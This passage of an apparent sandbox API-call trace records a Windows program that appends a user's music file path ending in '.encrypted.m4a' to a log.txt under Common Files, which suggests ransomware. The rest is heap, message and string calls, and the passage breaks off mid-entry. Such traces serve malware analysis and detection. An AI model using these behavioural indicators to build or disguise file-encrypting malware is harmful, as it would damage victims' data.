[0037.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0037.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0037.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xaa0008 [0037.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0037.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.488] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.488] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.488] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0037.488] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.488] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0037.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0037.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0037.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.488] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0037.488] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x21bd, lpOverlapped=0x0) returned 1 [0037.488] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0037.488] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x21bd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.488] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0037.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0037.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0037.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0037.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.encrypted.m4a\r\n", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0037.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3e) returned 0x7ab338 [0037.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.encrypted.m4a\r\n", cchWideChar=62, lpMultiByteStr=0x7ab338, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.encrypted.m4a\r\n", lpUsedDefaultChar=0x0) returned 62 [0037.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0037.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0037.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0037.489] WriteFile (in: hFile=0x140, lpBuffer=0x7ab380*, nNumberOfBytesToWrite=0x3d, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7ab380*, lpNumberOfBytesWritten=0x6aee3c*=0x3d, lpOverlapped=0x0) returned 1 [0037.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.489] CloseHandle (hObject=0x140) returned 1 [0037.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0037.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0037.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0037.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0037.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0037.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0037.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0037.490] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0037.490] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0037.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0037.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0037.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0037.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0037.491] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0037.492] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.492] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0037.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0037.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0037.492] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0037.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0037.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0037.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af3e8 [0037.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0037.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0037.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0037.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0037.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0037.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce20 [0037.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0037.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0037.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0037.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0037.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0037.492] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0037.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0037.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0037.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0037.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0037.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0037.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0037.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0037.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0037.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0037.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0037.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0037.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0037.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0037.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0037.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0037.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0037.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0037.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0037.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0037.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0037.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0037.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0037.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0037.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0037.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0037.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0037.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0037.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0037.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0037.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0037.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0037.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0037.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0037.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0037.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0037.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0037.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0037.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0037.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0037.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0037.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0037.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0037.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0037.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0037.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0037.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0037.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0037.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0037.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0037.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0037.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0037.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0037.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0037.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0037.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0037.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0037.495] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0037.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0037.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0037.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0037.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0037.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0037.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0037.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0037.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0037.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.496] HeapFree (in: 